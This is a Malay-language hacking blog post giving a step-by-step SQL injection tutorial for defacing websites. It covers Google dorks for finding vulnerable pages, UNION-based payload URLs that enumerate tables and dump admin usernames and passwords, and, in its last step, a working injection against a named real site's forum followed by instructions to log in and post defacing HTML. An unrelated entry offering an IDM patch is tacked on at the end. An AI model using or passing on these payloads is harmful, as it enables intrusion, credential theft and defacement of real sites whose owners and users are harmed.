asalamualikum,Alex Hc Was Here.heeheh Tkut x??..tutorial kali ini tutorial deface site mengunakan WebDav
Yang Diciptakan Oleh Hmei7 .Hmei7 Berasal Daripada Indonesia.beliau mencipta tool ini Khas kepada peminat hacking,deface dan sebagainya..Tpi klu nk Hack Website yang Mempunyai vuln

WebDav Google Dorks

Lgi senang jika ada orang share bagi
Or terjumpa
Site Vuln WebDav

Kata kunci yang perlu diketahui
-------------------------------
karakter : ', -
comments : /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x ke atas

Google Dork yang akan di gunakan ialah -->


"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="

-------------------------Langkah Pertama-------------------------

 www.target.com/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh inject code :-

www.target.com/news.php?id=1'
atau
www.target.com/news.php?id=-1

Contoh pesan error :-
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

-------------------------Langkah Kedua-------------------------

Cari jumlah table yang ada di dalam database.
tambahkan : +order+by+1-- diakhir url

Contoh:

Code:
www.target.com/news.php?id=1+order+by+1--
atau
www.target.com/news.php?id=1+order+by+1/* periksa secara bepringkat
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/*cari sehingga error keluar

Untuk tutorial ini jumlah table yg diperolehi ialah 3.

-------------------------Langkah Ketiga-------------------------

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
perintah yang akan digunakan : +union+select+1,2,3-- diakhir url


Contoh
www.target.com/news.php?id=1+union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka (2),

contoh:
www.target.com/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

version() = untuk lihat version msql yang digunakan
database() = untuk lihat name database yang digunakan



-------------------------Langkah Keempat-------------------------

untuk nampakkan nama2 table yang ada di web tersebut, perintah
table_name letak di angka yang keluar tadi --> (2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
atau kita tambah perintah karekter - di depan angka pertama
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--

-------------------------Langkah Kelima-------------------------

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Masukan selepas angka yang terakhir.

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

-------------------------Langkah Enam-------------------------

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin--

(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)

------
|info|
------
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

-------------------------Langkah Ketujuh-------------------------

Keluarkan hasil isi yang kita berjaya peroleh dari table Admin

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

-------------------------Langkah Terakhir-------------------------

Cari Login untuk Admin Pages.

Google Dork: inurl:/forums.asp?iFor=  Pilih target... Contoh target http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=17



Buang Number ( 17 ) Tu Seperti Bawah ini.. http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=



Selepas Buang ( 17 ) Tu = masukan SQL inject 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users



Contoh Dia Kan Menjadi Seperti ini.. http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users





10 TOPICS itu adalah USERNAME, Dan yang berderet dekat Bawah DATED  tu PASSWORD Cari Login, Dan maksud Kan salah satu USERNAME & PASSOWORD Yang Tersenarai tadi..





Bila dah Berjaya Login Masuk Anda Cari Perkataan POST NEW TOPIC, tekan di situ dan maksud Kan Html Anda, Lepas Dah Masukan HTML anda Tadi Di New Post, Cari Post Anda Tadi  CONTOH nanti dia akan Menjadi Seperti Ini http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=578&iFor=16

Asalamualikum,hahahahah...lama xupdate oke skng Aq selaku admin disini nk buat entri yg Bertajuk IDM..
IDM?? IDM ialah tool untuk mendonload dgn lebih laju..Lju ke?haxhaxhax..rasenya x...
hari nie nk kongsi ler tool patch and installer dye..sje nk buat entri dripd mende tue dripade duk menyemak dalam Laptop XD..Mengarut je aq nie!!

Okey gif nie aq buat guna photoscape best owh

jom tempah free sahaja